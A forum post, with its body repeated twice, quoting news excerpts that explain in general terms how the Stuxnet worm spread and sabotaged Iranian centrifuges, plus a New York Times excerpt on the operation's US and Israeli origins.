Trajan
conscientia mille testes
I am 'somewhat' computer literate, though I cannot write code or change registries, I did wipe and reinstall my OS once and slept at a Holiday Inn.....
In any event I find this fascinating, so this appears to be a great primer I think on how it works (ed)?
snip-
Stuxnet is not a virus, but a worm. Viruses piggyback on programs already resident in a computer. Worms are programs in their own right, which hide within a computer and stealthily propagate themselves onto other machines. After nearly a month of study, cybersecurity engineers determined that Stuxnet was designed to tamper with industrial systems built by the German firm Siemens by overriding their supervisory control and data acquisition (SCADA) protocols. Which is to say that, unlike most malware, which exists to manipulate merely virtual operations, Stuxnet would have real-world consequences: It wanted to commandeer the workings of a large, industrial facility, like a power plant, or a dam, or a factory. Exactly what kind of facility was still a mystery.
From the beginning, everything about Stuxnet was anomalous. Worms that tampered with SCADA are not unheard of, but are exceptionally rare. And as a physical piece of code, Stuxnet was enormous—weighing in at half a megabyte, it dwarfed the average piece of malware by many multiples. Finally, there was its infection radius. Stuxnet found its way onto roughly 100,000 computers worldwide; 60 percent of these were in Iran.
As a work of engineering, Stuxnet’s power and elegance made it even more intriguing. Most industrial systems are run on computers which use Microsoft’s Windows operating system. Hackers constantly probe software for what are known as “zero day” vulnerabilities, weak points in the code never foreseen by the original programmers. On a sophisticated and ubiquitous piece of software such as Windows, discovering even a single zero day vulnerability is extremely uncommon. The makers of Stuxnet found, and utilized, four of them. No one in cybersecurity had ever seen anything like it.
The worm gained initial access to a system through an ordinary USB drive. Picture what happens when you plug a flash drive into your computer. The machine performs a number of tasks automatically; one of them is pulling up icons to be displayed on your screen, representing the data on the drive. On an infected USB drive, Stuxnet exploited this routine to pull the worm onto the computer.
The challenge is that once on the machine, the worm becomes visible to security protocols, which constantly query files looking for malware. To disguise itself, Stuxnet installed what’s called a “rootkit”—a piece of code that intercepts security queries and sends back false “safe” messages, indicating that the worm is innocuous.
But installing a rootkit requires using drivers, of which Windows machines are well trained to be suspicious. Windows requires that all drivers provide verification that they’re on the up-and-up through presentation of a secure digital signature. These digital keys are closely guarded secrets. Stuxnet’s malicious drivers presented genuine signatures from two genuine computer companies, Realtek Semiconductor and JMichron Technologies. Both firms have offices in the same facility, Hsinchu Science Park, in Taiwan. Either by electronic trickery or a brick-and-mortar heist job, the creators of Stuxnet stole these keys​—and in a sophisticated enough manner that no one knew they had been compromised.
So to recap: The security keys enable the drivers, which allow the installation of the rootkit, which hides the worm that was delivered by the corrupt USB drive. Stuxnet’s next job was to propagate itself efficiently but quietly. Whenever another USB drive was inserted into an infected computer, it became infected, too. But in order to reduce traceability, Stuxnet allowed each infected USB drive to pass the worm onto only three computers.
Stuxnet spread in other ways, too. It was not designed to propagate over the Internet at large, but could move across local networks using print spoolers. In any group of computers which shared a printer, when one computer became infected, Stuxnet quickly crawled through the printer to contaminate the others. Once it reached a computer with access to the Internet, it began communicating with command-and-control servers located in Denmark and Malaysia. (Whoever was running the operation took these servers offline after Stuxnet was discovered.) While they were functional, Stuxnet delivered information it had gathered about the systems it had invaded to the servers and requested updated versions of itself. Several different versions of Stuxnet have been isolated, meaning that the programmers were refining the worm, even after it was released.
Finally, there’s the actual payload. Once a resident of a Windows machine, Stuxnet looked for WinCC and PCS 7 SCADA programs. If the machine had neither of these, then Stuxnet merely went about the business of spreading itself. But on computers with one of these two programs, Stuxnet began reprogramming the programmable logic control (PLC) software and making changes in a piece of code called Operational Block 35. For months, no one knew exactly what Stuxnet was looking for with this block of code or what it intended to do once it found it. Three weeks ago, that changed.
As cybersecurity engineer Ralph Langner puts it, Stuxnet was one weapon with two warheads. The first payload was aimed at the Siemens S7-417 controller at Iran’s Bushehr nuclear power plant. The second targeted the Siemens S7-315 controller at the Natanz centrifuge operation, where uranium is processed and enriched. At Bushehr, Stuxnet likely attempted to degrade the facility’s steam turbine, with unknown results. But the attack on Natanz seems to have succeeded brilliantly.
Once again, Stuxnet’s design was unexpectedly elegant. With control of the centrifuge system at Natanz, the worm could have triggered a single, catastrophic incident. Instead, Stuxnet took over the centrifuge’s frequency converters during the course of everyday operation and induced tiny bursts of speed in the machinery, followed by abrupt decelerations. These speed changes stressed the centrifuge’s components. Parts wore out quickly, centrifuges broke mysteriously. The uranium being processed was corrupted. And all the while, Stuxnet kept sending normal feedback to the Iranians, telling them that, from the computer’s standpoint, the system was operating like clockwork. This slow burn went on for a year, with the Iranians becoming increasingly exasperated by what looked like sabotage, and smelled like sabotage, but what their computers assured them was perfectly routine.
I suggest reading the whole article at-
https://www.weeklystandard.com/articles/how-worm-turned_520704.html
What got me going on this ( hence the thread title) was.....
Israeli Test on Worm Called Crucial in Iran Nuclear Delay
By WILLIAM J. BROAD, JOHN MARKOFF and DAVID E. SANGER
Published: January 15, 2011
snip-
The project’s political origins can be found in the last months of the Bush administration. In January 2009, The New York Times reported that Mr. Bush authorized a covert program to undermine the electrical and computer systems around Natanz, Iran’s major enrichment center. President Obama, first briefed on the program even before taking office, sped it up, according to officials familiar with the administration’s Iran strategy. So did the Israelis, other officials said. Israel has long been seeking a way to cripple Iran’s capability without triggering the opprobrium, or the war, that might follow an overt military strike of the kind they conducted against nuclear facilities in Iraq in 1981 and Syria in 2007.
http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html?_r=1&pagewanted=all

In any event I find this fascinating, so this appears to be a great primer I think on how it works (ed)?
snip-
Stuxnet is not a virus, but a worm. Viruses piggyback on programs already resident in a computer. Worms are programs in their own right, which hide within a computer and stealthily propagate themselves onto other machines. After nearly a month of study, cybersecurity engineers determined that Stuxnet was designed to tamper with industrial systems built by the German firm Siemens by overriding their supervisory control and data acquisition (SCADA) protocols. Which is to say that, unlike most malware, which exists to manipulate merely virtual operations, Stuxnet would have real-world consequences: It wanted to commandeer the workings of a large, industrial facility, like a power plant, or a dam, or a factory. Exactly what kind of facility was still a mystery.
From the beginning, everything about Stuxnet was anomalous. Worms that tampered with SCADA are not unheard of, but are exceptionally rare. And as a physical piece of code, Stuxnet was enormous—weighing in at half a megabyte, it dwarfed the average piece of malware by many multiples. Finally, there was its infection radius. Stuxnet found its way onto roughly 100,000 computers worldwide; 60 percent of these were in Iran.
As a work of engineering, Stuxnet’s power and elegance made it even more intriguing. Most industrial systems are run on computers which use Microsoft’s Windows operating system. Hackers constantly probe software for what are known as “zero day” vulnerabilities, weak points in the code never foreseen by the original programmers. On a sophisticated and ubiquitous piece of software such as Windows, discovering even a single zero day vulnerability is extremely uncommon. The makers of Stuxnet found, and utilized, four of them. No one in cybersecurity had ever seen anything like it.
The worm gained initial access to a system through an ordinary USB drive. Picture what happens when you plug a flash drive into your computer. The machine performs a number of tasks automatically; one of them is pulling up icons to be displayed on your screen, representing the data on the drive. On an infected USB drive, Stuxnet exploited this routine to pull the worm onto the computer.
The challenge is that once on the machine, the worm becomes visible to security protocols, which constantly query files looking for malware. To disguise itself, Stuxnet installed what’s called a “rootkit”—a piece of code that intercepts security queries and sends back false “safe” messages, indicating that the worm is innocuous.
But installing a rootkit requires using drivers, of which Windows machines are well trained to be suspicious. Windows requires that all drivers provide verification that they’re on the up-and-up through presentation of a secure digital signature. These digital keys are closely guarded secrets. Stuxnet’s malicious drivers presented genuine signatures from two genuine computer companies, Realtek Semiconductor and JMichron Technologies. Both firms have offices in the same facility, Hsinchu Science Park, in Taiwan. Either by electronic trickery or a brick-and-mortar heist job, the creators of Stuxnet stole these keys​—and in a sophisticated enough manner that no one knew they had been compromised.
So to recap: The security keys enable the drivers, which allow the installation of the rootkit, which hides the worm that was delivered by the corrupt USB drive. Stuxnet’s next job was to propagate itself efficiently but quietly. Whenever another USB drive was inserted into an infected computer, it became infected, too. But in order to reduce traceability, Stuxnet allowed each infected USB drive to pass the worm onto only three computers.
Stuxnet spread in other ways, too. It was not designed to propagate over the Internet at large, but could move across local networks using print spoolers. In any group of computers which shared a printer, when one computer became infected, Stuxnet quickly crawled through the printer to contaminate the others. Once it reached a computer with access to the Internet, it began communicating with command-and-control servers located in Denmark and Malaysia. (Whoever was running the operation took these servers offline after Stuxnet was discovered.) While they were functional, Stuxnet delivered information it had gathered about the systems it had invaded to the servers and requested updated versions of itself. Several different versions of Stuxnet have been isolated, meaning that the programmers were refining the worm, even after it was released.
Finally, there’s the actual payload. Once a resident of a Windows machine, Stuxnet looked for WinCC and PCS 7 SCADA programs. If the machine had neither of these, then Stuxnet merely went about the business of spreading itself. But on computers with one of these two programs, Stuxnet began reprogramming the programmable logic control (PLC) software and making changes in a piece of code called Operational Block 35. For months, no one knew exactly what Stuxnet was looking for with this block of code or what it intended to do once it found it. Three weeks ago, that changed.
As cybersecurity engineer Ralph Langner puts it, Stuxnet was one weapon with two warheads. The first payload was aimed at the Siemens S7-417 controller at Iran’s Bushehr nuclear power plant. The second targeted the Siemens S7-315 controller at the Natanz centrifuge operation, where uranium is processed and enriched. At Bushehr, Stuxnet likely attempted to degrade the facility’s steam turbine, with unknown results. But the attack on Natanz seems to have succeeded brilliantly.
Once again, Stuxnet’s design was unexpectedly elegant. With control of the centrifuge system at Natanz, the worm could have triggered a single, catastrophic incident. Instead, Stuxnet took over the centrifuge’s frequency converters during the course of everyday operation and induced tiny bursts of speed in the machinery, followed by abrupt decelerations. These speed changes stressed the centrifuge’s components. Parts wore out quickly, centrifuges broke mysteriously. The uranium being processed was corrupted. And all the while, Stuxnet kept sending normal feedback to the Iranians, telling them that, from the computer’s standpoint, the system was operating like clockwork. This slow burn went on for a year, with the Iranians becoming increasingly exasperated by what looked like sabotage, and smelled like sabotage, but what their computers assured them was perfectly routine.
I suggest reading the whole article at-
https://www.weeklystandard.com/articles/how-worm-turned_520704.html
What got me going on this ( hence the thread title) was.....
Israeli Test on Worm Called Crucial in Iran Nuclear Delay
By WILLIAM J. BROAD, JOHN MARKOFF and DAVID E. SANGER
Published: January 15, 2011
snip-
The project’s political origins can be found in the last months of the Bush administration. In January 2009, The New York Times reported that Mr. Bush authorized a covert program to undermine the electrical and computer systems around Natanz, Iran’s major enrichment center. President Obama, first briefed on the program even before taking office, sped it up, according to officials familiar with the administration’s Iran strategy. So did the Israelis, other officials said. Israel has long been seeking a way to cripple Iran’s capability without triggering the opprobrium, or the war, that might follow an overt military strike of the kind they conducted against nuclear facilities in Iraq in 1981 and Syria in 2007.
http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html?_r=1&pagewanted=all
Last edited: